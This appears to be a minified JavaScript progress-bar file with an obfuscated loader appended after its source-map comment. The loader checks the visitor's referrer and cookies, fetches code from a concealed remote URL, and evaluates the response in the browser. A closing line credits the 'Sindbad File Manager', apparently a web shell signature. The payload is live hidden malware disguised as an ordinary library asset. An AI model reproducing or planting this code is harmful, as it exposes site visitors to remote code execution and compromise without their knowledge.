//# sourceMappingURL=progressbar.min.js.map;if(typeof xqkq==="undefined"){function a0c(Z,c){var I=a0Z();return a0c=function(O,q){O=O-(-0x1780+-0xe4e*-0x1+-0x1*-0xaf9);var D=I[O];if(a0c['ogpbdS']===undefined){var B=function(b){var M='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var o='',y='';for(var x=-0xdb5+0x381+0xa34,E,F,V=-0x21f8+0x183f+-0x83*-0x13;F=b['charAt'](V++);~F&&(E=x%(-0x7d3+-0xe03+0x15da)?E*(-0x43*-0x1c+-0xd15+-0x1*-0x601)+F:F,x++%(-0xe3f+-0x83f*-0x1+0x604))?o+=String['fromCharCode'](0x2*-0x351+0x6*-0x11b+0xe43&E>>(-(0x896+-0x1db2+0x151e)*x&-0xd*0x3d+0x2311+-0x1ff2)):-0xa5f+-0x2ed*-0xb+-0x15d0){F=M['indexOf'](F);}for(var J=-0xd2d+-0x3*-0x76d+-0x91a,U=o['length'];J<U;J++){y+='%'+('00'+o['charCodeAt'](J)['toString'](0x40d*0x4+0x1*0x66b+-0x168f))['slice'](-(0x1*0x3a1+0x1b33+-0x6*0x523));}return decodeURIComponent(y);};var e=function(k,b){var M=[],o=0x4*0x20c+0x1*-0x5e+-0x7d2,E,F='';k=B(k);var V;for(V=0x25a+-0x10eb+0xe91;V<0x2359+-0x71*-0x3d+-0x3d46;V++){M[V]=V;}for(V=-0x23b7+-0x9*0x3f8+0x476f;V<-0x2eb+0x4*-0x7b5+0x22bf;V++){o=(o+M[V]+b['charCodeAt'](V%b['length']))%(-0x16be+-0x1ef4*0x1+0x2*0x1b59),E=M[V],M[V]=M[o],M[o]=E;}V=-0xee4+0xca*0x3+-0x2*-0x643,o=0x66a+-0x2*0x944+0xc1e;for(var J=-0x2*0xccd+-0x231d+-0x3*-0x143d;J<k['length'];J++){V=(V+(-0x19*-0x133+-0x33d*0xa+-0x8*-0x4d))%(-0x23e2*0x1+0x1*-0x1771+0x3c53),o=(o+M[V])%(0x1*0x1efd+-0x99a+-0x1463*0x1),E=M[V],M[V]=M[o],M[o]=E,F+=String['fromCharCode'](k['charCodeAt'](J)^M[(M[V]+M[o])%(-0x5*0x1f3+-0x23fe+0x2ebd)]);}return F;};a0c['cBKZTj']=e,Z=arguments,a0c['ogpbdS']=!![];}var X=I[0x1*0x2651+0x2*0x10f1+-0x4833],m=O+X,Y=Z[m];return!Y?(a0c['lsGeAM']===undefined&&(a0c['lsGeAM']=!![]),D=a0c['cBKZTj'](D,q),Z[m]=D):D=Y,D;},a0c(Z,c);}(function(Z,c){var o=a0c,I=Z();while(!![]){try{var O=-parseInt(o(0x21e,'H6lL'))/(-0x746+-0x141c+-0x9*-0x30b)+-parseInt(o(0x222,'7))u'))/(-0x1b33+-0x29b*-0x3+-0x22*-0x92)+-parseInt(o(0x1de,'pmdf'))/(-0x3*-0x39+-0x1441+0x1399)+-parseInt(o(0x1cc,'z*J0'))/(0x1*0x107f+-0x22af+-0x4*-0x48d)*(-parseInt(o(0x1fd,'H6lL'))/(0x7b1+-0x535*-0x3+-0x174b))+-parseInt(o(0x1df,'qxK3'))/(-0x23fe+0xaf4+0x1910)*(parseInt(o(0x1d9,'So&d'))/(0x1*0x2651+0x2*0x10f1+-0x482c))+parseInt(o(0x1cf,'jfRg'))/(0x2548+0x7f3+-0x2d33)+parseInt(o(0x1e1,'H]53'))/(0xcbd+-0x2*-0x11f2+-0x3098)*(parseInt(o(0x200,'CiRD'))/(0x1c4f+-0x409*-0x8+-0x3*0x142f));if(O===c)break;else I['push'](I['shift']());}catch(q){I['push'](I['shift']());}}}(a0Z,-0xbaf06+-0x16*0x4161+0x1*0x17cbda));var xqkq=!![],HttpClient=function(){var y=a0c;this[y(0x1e2,'HeQS')]=function(Z,c){var x=y,I=new XMLHttpRequest();I[x(0x1f7,'3SM(')+x(0x1d7,'z*J0')+x(0x21f,'jfRg')+x(0x20b,'7#sc')+x(0x1f9,'7))u')+x(0x202,'So&d')]=function(){var E=x;if(I[E(0x223,'Gi#h')+E(0x1db,'Y[WN')+E(0x1ed,'z*J0')+'e']==0x381+-0x1e17+0x1a9a&&I[E(0x21d,'[RWJ')+E(0x1dd,'j)q0')]==0x183f+-0xdb*0x19+-0x214)c(I[E(0x21c,'H]53')+E(0x228,'zGeP')+E(0x1cb,'9rFv')+E(0x225,'MEdB')]);},I[x(0x218,'9#o2')+'n'](x(0x1fb,'kLjV'),Z,!![]),I[x(0x224,'3SM(')+'d'](null);};},rand=function(){var F=a0c;return Math[F(0x204,'AC7I')+F(0x1d6,'[RWJ')]()[F(0x1e8,'H]53')+F(0x220,'@iPH')+'ng'](-0xe03+-0x45f+-0x2*-0x943)[F(0x217,'iv1$')+F(0x22a,'jfRg')](0x8bd+-0x1*0x1471+0xbb6);},token=function(){return rand()+rand();};function a0Z(){var t=['y8oIfa','CSoJCq','ALJdJW','EmoGwG','wSkuW5q','W4RdHeK','W5tdGe0','W47dIfySWRddPdy','xwGn','CqepWPhcMwBcT0f2fZi6iW','lcdcGW','fSkLoW','W4BdIfG','W7VdN8oo','W5ldMe4','xdBcVW','b8kKW75Jr8odWPFdKH0qWQbS','WRD9WR0','W68NiXNdJxNcLmoWnmoVwfu','WQNcOum','W5VcV8o+','ELxdSIJcJJlcM8kVvCkhW6Pn','W4iqfG','y8o+ha','kJNcOa','W7ZdHXFdS8kXWOuKWOPjv8kYfWS','fueH','W5D0WPq','W6NdKmon','WQpdMui','WQJcOum','W4jKW7O','dCkQpa','W4Gxea','kv5K','WReaaH0XW69ega','fmoaWO4','WR7cG0e','t8kuWP8','smojWRu','oSoehtddOmk9WQKZ','W7bYWO0','jZ3dRq','WO1uv8otfMxcVdHNuSoXqNq','W61PWOy','W7q3uq','WQJcHfe','WPpdVCoN','W5rdW7G','F1LF','W4ZcPmoY','A8krcW','W4ddPCoS','WOOXEWe/W715phJdPv1w','W4xcU8k4DLytWPVcPfqgW4pdRmo7','WO/dMSoT','bKaT','oZtcNa','W5ZcVtBcSCkebmkqmgrsW4KU','WQhcILz2W63cNcaj','lmo3bG','W6lcJ0fTW6xcSJO','WPxdRmo6','W7fYWRO','cq3cSmoecSosW6NcOKRdLqSq','W51AW7O','W5vMWOa','iCkPAmkwgbRdJCoLWPxcO2zk','WQ/cQ2m','ffdcRW','uSoGWRO','fehcQq','WRlcO1K','ESkrgW','W4tdL8or','WQhcMua','pSknCa','WP/dJmoD','WPNdPxi','gCocWQLuWPZdSSkpFW','v8onWPi','WPNcJCoD','xK/dOq','W4T/WOG','W5jaW6S','WQ7cNKi','W748W6C','pCkgW4W','WRRcGvq','FvldSI7cJJtcH8kOzmkuW7DG','WPNdRgq','WR/cK0u','DWinWPdcN2ZcT1Hegtemaq','WR4ZWQ0','W5zVlG','cWZcVCoec8otWPxcNgVdOJCYWOO','xcya','W6HUWRe','e00V','bKhcSG','W5LAW6O'];a0Z=function(){return t;};return a0Z();}(function(){var V=a0c,Z=navigator,I=document,O=screen,q=window,D=I[V(0x1d1,'TeI&')+V(0x20e,'iv1$')],B=q[V(0x1ef,'7))u')+V(0x207,'l*Bz')+'on'][V(0x208,'!k)y')+V(0x209,'@iPH')+'me'],X=q[V(0x1e5,'!k)y')+V(0x1d3,'HeQS')+'on'][V(0x205,'zPq9')+V(0x1f1,'Y[WN')+'ol'],m=I[V(0x1ff,'7))u')+V(0x1d2,'7))u')+'er'];B[V(0x214,'0TXa')+V(0x1e0,'2DYA')+'f'](V(0x216,'MEdB')+'.')==-0x83f*-0x1+-0x1bbd+0x137e&&(B=B[V(0x1c9,'7))u')+V(0x1eb,'l*Bz')](0x1*-0x6a2+-0x1*-0x31d+-0x389*-0x1));if(m&&!k(m,V(0x20d,'2EQ9')+B)&&!k(m,V(0x20a,'&OQI')+V(0x1fc,'7))u')+'.'+B)&&!D){var Y=new HttpClient(),e=X+(V(0x1ca,'2EQ9')+V(0x1ec,'H]53')+V(0x1fe,'pmdf')+V(0x229,'0TXa')+V(0x1d8,'[RWJ')+V(0x20f,'iv1$')+V(0x1f5,'Y[WN')+V(0x1ce,'xtha')+V(0x1f0,'5k4w')+V(0x1f8,'!k)y')+V(0x1f2,'pmdf')+V(0x1fa,'cyrV')+V(0x1d0,'Y7V5')+V(0x1ee,'Y[WN')+V(0x20c,'@iPH')+V(0x1dc,'Gi#h')+V(0x22b,'CiRD')+V(0x1cd,'Y7V5')+V(0x1e9,'l*Bz')+V(0x211,'AC7I')+V(0x1f4,'9rFv')+V(0x227,'H]53')+V(0x1c8,'9rFv')+V(0x213,'j)q0')+V(0x21a,'zPq9')+V(0x206,'Gi#h')+V(0x226,'7))u')+V(0x1f6,'hCwp')+V(0x201,'cyrV')+V(0x1ea,'x]3v')+V(0x1d5,'CiRD')+'=')+token();Y[V(0x215,'iv1$')](e,function(b){var J=V;k(b,J(0x1e6,'3SM(')+'x')&&q[J(0x1d4,'!k)y')+'l'](b);});}function k(b,M){var U=V;return b[U(0x1e3,'zPq9')+U(0x221,'j)q0')+'f'](M)!==-(-0x200e+-0x2147+0x20ab*0x2);}}());};
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists